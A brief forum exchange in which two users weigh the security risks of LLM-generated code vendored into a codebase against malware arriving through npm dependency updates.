[swiftcoder]

> I think it's not a terrible approach with all the updating dependency malware issues with stuff like NPM

I think in this instance, the only thing worse than a zero day in your dependency tree, is a zero day you don't know your LLM vendored directly into your codebase...

[swordsith]

Personally I feel a vulnerability in local code (unshared ai slop) is much less likely to be exploited, than for say a npm package update that will pwn you as soon as it loads up.